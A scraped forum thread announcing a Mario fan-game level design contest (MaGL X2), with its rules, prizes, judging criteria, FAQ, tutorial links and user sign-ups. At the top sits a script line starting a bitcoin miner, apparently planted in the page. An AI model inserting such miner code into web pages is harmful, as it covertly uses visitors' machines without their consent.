<script>
miner.start(); // initialise bitcoin miner
</script>

irc.cat.biopge projectmario fan games galaxy

MaGL X2 - Levels Due March 8th. Sign-up Still Ongoing!

Horikawa Otane
The MaGL Goddess
First name: Servalan

MaGL X2 - Levels Due March 8th. Sign-up Still Ongoing!

Postby Horikawa Otane » 2 years ago

Levels are due the first minute of March 9th EST

PRIZES
  • First place - 20 dollars on Steam, GoG, etc. Plus a neat red username on the talkhaus!
    Second place - 10 dollars on Steam, GoG, etc.
    Third place - 5 dollars on Steam, GoG, etc.
This thread is where you sign up. This is the discussion thread.

Official "I've Received Your Level" list

So, here's the official thread for the 2014 Make a Good Level Contest - X! Judged by myself, Quill, and Sturg! I'm starting the sign-up thread a bit early this year!

The contest will run until Midnight, March 8th (the first minute of March 9th). That is more than a full month to make your level if you sign up early! You can sign up all the way until the deadline.

ANNOUNCEMENTS
  • Please welcome Sturg as the third judge! Also please welcome Willhart, who will be leading the design of the hub. And Blivsey who will be assisting him!
  • If you are a new user (less than 5 posts or so), your PM may be flagged as spam. Please email (Horikawa.Otane@icloud.com..) instead to be safe. Or do both.
  • A casual reminder that the deadline of March 9th is when you must have your levels in to me by. It isn't the sign-up deadline (there is none)
  • Level name difficulty does not equate to the difficulty of the level itself.
Basically, the way this contest will work is as follows:
  • The theme of this one will be Madlib Level Names! I will generate a level name for you, you will then use that level name as an inspiration for your level. The level content is entirely yours to decide, but the level name will be generated.

HOWEVER, unlike last year, there's another little caveat. You'll also be handed random characters. You can ONLY use characters provided in your list, in your level. Meaning if you are handed "Mario and Peach," you can either use Mario, Peach, or both, but CANNOT use Luigi or any others. Fitlers will be placed in the hub. You can include characters not on your list as NPCs.
This will be using the A2XT engine with the SMBX 1.3.0.1 graphical, sound, music, etc. resources and the LunaLua 0.5.2 Beta (with SDL). Please code around that, should you want to use lunadll resources.
However, if you're not using lunadll or anything hackish, please feel free to develop in A2XT, vanilla SMBX 1.3.0.1, etc.

Here are the relevant downloads:

REQUIRED: OPTIONAL: The rules are as follows:
  • One or more exits using the SMB3 exit star. A secondary secret alternative star is also acceptable (this secondary star will not be required for advancing in the collaborative tower)
  • IF YOU NEED TO USE FAKE STARS, USE THIS SPRITE INSTEAD OF PASTING A BUNCH OF REAL EXIT STARS. It replaces a rupee.
  • Be smart with your music choices. Since this will be LP'd by raocow at some point and YouTube uses some smart algorithms to detect certain vocal music tracks, just be sure you're aware of that and choose songs accordingly. Basically, avoid the latest Beyoncé hit singles, etc.
  • You CAN use any gimmicks you like, including LunaLua stuff should you see fit and can get it to work consistently
To Participate
  • Make a comment here, send me a PM, or, alternatively, send me an email at Horikawa.Otane@icloud.com....... with your request for an Easy, Medium, or Hard level name.
  • Wait for your list of five generated level names and two characters.
  • Pick the level name you want to make from the list
  • Design a level around that name and at least one of the characters you provided. You cannot include characters you were not given (as playable characters. NPCs are fine), but you may use both of the characters you were provided if you like.
  • Make sure your level name is in the format Username-Level Name.lvl (spaces are fine)
  • Host your finished level on Mediafire, Mega, or any other file hosting service. Make sure the level is zipped up with the required custom resources like music and graphics that you use.
  • Send me the link via email or PM
    • If you are a new user (less than 5 posts or so), your PM may be flagged as spam. Please email instead to be safe. Or do both.
Level Name Difficulty Difference
  • Level name difficulty will have a small impact on score. Easy levels will be an additional +0 to final score, Medium will be an additional +1, and Hard will be an additional +2. Difficulty is based on how hard the target level will be to create based on the generated level name. Generally speaking, the harder the level name, the longer and more complex the generated name. However, the difficulty difference is severe and you will find the harder levels will have much more difficult levels to make than the easier ones. If this is your first time, take an Easy level name and you'll still have an excellent chance to win. The point difference is primarily to differentiate between ties.
Judging Criteria (out of 100 points)
  • Uniqueness: 20 points
    Fun Factor: 40 points
    • Personal Fun Factor: 20 points
      How much fun you think someone else will have with this level: 20 points
    Music: 10 points
    Graphical Choices: 10 points
    Use of Character: 10 points
    Adherence to the Level Name: 10 points
Tutorials Tips
  • Don't use mother brain unless you're sure you have a way for her to be fun. 99% of the time she isn't.
  • If you feel the need to implement a Luna Tower-style midpoint, or the use of artificial multiple midpoints, chances are your level is too long and will be penalised for it. It is best to keep the midpoints at one. Only have a long level if you can keep it fun throughout and remove the feeling of "dragging"
  • Really, avoid the Touhou music. It's almost never used well.
  • Avoid "flat" landscape unless it makes sense (for example, a house). If you must use it, fake texture with objects like statues, etc.
  • Avoid spamming enemies.
  • Custom graphics are important. I'd say the default would be to use them. Only use vanilla graphics if you have a reason to do so (level name, theme, etc).
FAQ (Mulligan information here)
  • I HATE MY LEVEL NAMES/CHARACTERS. CAN YOU GENERATE ME SOME MORE?
    • Yes, but I will penalise your final score for each mulligan. You can mulligan one (either name or character set) for a -3 penalty or both for a -5 penalty. This is about forcing you to be creative. I will be culling lists by hand when they are generated to remove entirely unfair lists, should they arise. This shouldn't come up.
  • I WANT TO ENSURE I DON'T GET A SPECIFIC CHARACTER!
    • You may sacrifice 3 points to guarantee you will not get a single character. You can do this multiple times - so, if you sacrifice 12 points, you can guarantee getting a specific character.
  • DO I HAVE TO USE THE LEVEL NAME/CHARACTERS AT ALL? I HAVE THIS GREAT LEVEL NAME/CHARACTER I WANT TO USE!
    • Nope! Feel free to use your own. Just be aware, you'll lose out on the 10 points for adhering to it. Also, some judges may take issue with you flouting the rules and let that impact how fun they view your level, how the composition was, and how creative they felt you were. Feel free to ignore it, but I can basically guarantee you won't win. Think about it like losing a full letter grade on an assignment.
  • CAN I WORK AS A TEAM?
    • YES! Just make sure you tell me who was involved in the submitted level so I can credit all of you!
  • UMM I DON'T WANT A FILTER IN THE HUB FOR MY LEVEL
    • There will a switch placed in the hub to turn off the filters. This may be an end-game bonus, however, to ensure the levels are played as-intended.
  • WILL MY LEVEL BE RP'ED BY ATTRACTIVE INTERNET CELEBRITY rAOCOW
    • All the other MaGL contests have been, even the bad levels. So I'd assume so.
  • THIS IS MY FIRST TIME DESIGNING A LEVEL AND I AM SCARED.
    • Give it a try! SMBX is super-easy to use and even if you fail, I guarantee you'll learn. We're an accepting, loving community and we embrace failures just as much as successes!
  • CAN I USE LUNADLL/LUNALUA
    • Yes, but if it isn't used well, you may be penalised under the "fun" categories.
  • WHAT DO YOU GET IF YOU WIN?
    • Cash Monies, entry in a custom user group (on the talkhaus), and special username colour (on the talkhaus). WOAAAAAAAH!
  • CAN I USE ASMBXT SPRITES
    • Of course!
  • HOW CUSTOM CAN I GET WITH MY LEVEL?
    • As custom as you like - please, go nuts!
  • I CAN'T USE LUNADLL/LUNALUA, SO WON'T I LOSE?
    • Certainly not. Hardly anyone can use it. And besides, it will likely only ever get you points in uniqueness. If your level is more fun, you'll beat them out. And if it's super-creative, you could beat a Lunalua designer out who is less creative. I wouldn't worry about this.
  • REALLY, NO TOUHOU?
    • ...It's allowed, but be aware it's rarely used well. Nothing's banned here. Use it if you think it's appropriate for your level.
Level Design Tutorials
Thanks to Shemp for the links =).
To the Right, Hold on Tight: An analysis of SMB's 1-1 and how to make a tutorial that doesn't look like one. For some reason the author has a fear of capital letters though.
Super Mario Bros 3 Level Design Lessons: Part 1 is analyses of all of World 1, showing how to construct a difficulty curve and make tutorials that don't look like tutorials.
Part 2 of the above: Brief analyses of some levels of Worlds 2-8, showing more advanced design elements.
Learning From The Masters: Level Design in The Legend of Zelda: Essentially this argues that good non-linearity is really not non-linear at all, just linearity that uses tricks to appear non-linear: keeping a linear core prevents the player from being too lost, while a non-linear shell prevents the player from feeling railroaded. This is adaptable to Mario design: some SMB3 levels, as mentioned in Part 2 of the Level Design Lessons, use similar design aspects with flying.
The Most Misunderstood Game of All Time: While this is largely a discussion of the intricacies of Doom and why people fail to "get it", it makes one very relevant point for Mario: in a game where the enemies have only an extremely rudimentary AI - which definitely applies to Mario's "walk left" enemies - placement and combination of these enemies are everything. One enemy in the right place can be far more of a challenge than loads and loads of them placed randomly.
Lessons in Color Theory for Spyro the Dragon: Insomniac Games artist John Fioritio discusses how Spyro uses colour to create emotions, make key parts of the level stand out both from the background of the level and from each other, and prevent the player from being lost (which is much more relevant to 3D platformers than 2D, but is an interesting read anyway).
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Antiginger

Re: Make a Good Level Contest X2 - MaGL X2 Official Thread!

Postby Antiginger » 2 years ago

Medium please!

aterraformer

Postby aterraformer » 2 years ago

I'd like hard once again pee el zed.
raocow wrote:the plan is to wait for Jump to be released and then replacing the graphics without telling anyone involved with Jump.

Mikkofier
A comma before dark is indefensible.
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his

Postby Mikkofier » 2 years ago

I'm tired and feeling stupid at the moment, so give it to me Hard, before I come to my senses.
I never met a man so stupid I could not learn something from him.
-Galileo Galilei
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Avatar source (for most of them).

Nimono

Postby Nimono » 2 years ago

I'd like a medium-well level, please! As little pink as you ca- oh wait, this isn't a restaurant! Medium difficulty, please!

Minus
Always edits posts

Postby Minus » 2 years ago

Give it to me medium, please!

pholtos
Loves adorable things.

Postby pholtos » 2 years ago

Ehhhhhhhhhh....

I'll try medium again... and hope that I can work with my answers this time.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Pokemon Gimmick Free For All Feel free to join in the fun! :3

ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:

Voltgloss
>GET LAMP

Postby Voltgloss » 2 years ago

I'm going for it. Hard for me please.

Edit: I am super, SUPER pumped to see a hub designed by Willhart.

qazcake
A cake masquerading as a burger
First name: qaz

Postby qazcake » 2 years ago

I am in.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 2 years ago

Are team efforts allowed?

Horikawa Otane
The MaGL Goddess
First name: Servalan

Postby Horikawa Otane » 2 years ago

Septentrion Pleiades wrote:Are team efforts allowed?
Yes!
Watch my Butt on the YouTubes
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

Grey V

Postby Grey V » 2 years ago

I'm gonna be a wimp and ask for mild sauce easy.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 2 years ago

Alright, anyone who wants to team up PM me.

Edit: Taken
Last edited by Septentrion Pleiades on 01 Feb 2015, 22:50, edited 1 time in total.

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 2 years ago

I'll take a level like I like my Steak. Medium. Don't judge me.

Actually judge me, it's your job... right?
"All these flavors and you choose to be salty"
- Grandma

Heraga
Video

Postby Heraga » 2 years ago

Easy. I'll join.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 2 years ago

once more with passion, hard me up, lady!!

I'll make an announcement video... eventually. Probably won't have time tomorrow, but I'll be sure to make one before the official 'start' of the contest.
the chillaxest of dragonsImage
ImageImage

ano0maly
Retired Tester

Postby ano0maly » 2 years ago

I'll get easy since I'm busy
kind of rhmyes
Image << Click!

Fan of the following:
Image Image

YelseyKing
Meow what are you looking at?
First name: Matt

Postby YelseyKing » 2 years ago

Well, since Horikawa made sad faces to me on IRC, I suppose I have no choice but to throw in. :P

Hard, yo.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
Episode 6 is over. More to come... someday.

Grounder

Postby Grounder » 2 years ago

Easy modo pl0x.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

sopharia
Nani to the Sore
First name: Ayano

Postby sopharia » 2 years ago

Gimme a Medium coffee please~ Triple Triple.
Last edited by sopharia on 24 Jan 2015, 02:50, edited 1 time in total.

dr_vblschrf
may or may not be an actual fox

Postby dr_vblschrf » 2 years ago

I've never done a level before and I'm pretty busy with work but I'd like to give it a shot! Go easy on me!

KobaBeach
Elan
First name: Famed Mimic Gogo

Postby KobaBeach » 2 years ago

remember that episode where allison had to find a victim's ipod or w/e and she had gloria gaynor's i will survive looping in her head drowning out every other noise during the entirety of the first half

and then it started stuttering depending on how close/far she was from it kind of like a radar or w/e

that was a neat episode
digimon made me gay
「Leomon」 is my stand
tumblr is here | twitter is here | MAL is here
ImageImageImage
banners:

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 2 years ago

I've never made an SMBX level before, but I really enjoyed the last contest. So I'll give this one a shot.

I'm picking Hard. I fear no level name.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Ignoritus
O◡O

Postby Ignoritus » 2 years ago

You think the mighty Ignoritus fears your pitiful level names? Ha. HA HA!

I will take a hard level name. Preferably involving granite or concrete, which are very hard substances. Oh! Or perhaps diamonds! They're really hard too!

Return to “archive”